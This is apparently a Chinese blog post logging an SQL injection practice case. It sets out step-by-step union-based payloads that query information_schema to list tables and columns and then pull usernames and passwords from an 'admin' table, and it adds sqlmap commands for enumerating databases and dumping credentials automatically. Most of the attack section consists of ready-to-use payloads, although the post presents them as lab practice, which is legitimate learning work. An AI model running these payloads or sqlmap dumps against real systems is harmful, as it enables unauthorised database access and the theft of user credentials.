-
SQL注入案例
目录
一、简介
记录SQL注入的案例练习
二、案例
1.发现注入点
2.寻找注入类型
,发现?id=1 and 1=1 符合
3.寻找字段数
发现字段数为2
4.将传参值设为超出数据量的大值,联合查询找到回显位置
5.找到数据库
6.寻找库中的表
?id=111111 union select 1,group_concat(table_name) from information_schema.tables where table_schema=database()--+
7.寻找表中列
?id=111111 union select 1,group_concat(column_name) from information_schema.columns where table_name='admin'--+
8.查看表中数据
?id=111111 union select 1,group_concat(username,‘:’,password) from admin--+
注:用 --+ 对结尾进行注释
附:SQLMap注入(sqlmap -u "x")
1.输入指令查数据库( --dbs)
2.输入指令查表( -D xx --tables)
3.脱库查看账号密码( -D xx -T xxx -C xxxx --dump)
注:默认全yes,可以添加 --batch 指令实现全自动yes
-
相关阅读:
日常工作报告生成器微信小程序源码 支持日报,周报,月报,年终终结
R语言聚类分析可视化
Spring更简单的读取和存储对象
亚马逊Appstore不兼容Android 12,历时近两个月仍未解决
lingo为什么不能运行该代码
解决跨越的几种方式
beyond compare如何设置只比较实际内容?(使用关联规则比较)
Golang对接Ldap(保姆级教程:概念&搭建&实战)
照片处理软件 DxO FilmPack 7 mac中文版软件介绍
Git 分支管理策略汇总
- 原文地址:https://blog.csdn.net/qq_59081708/article/details/132739673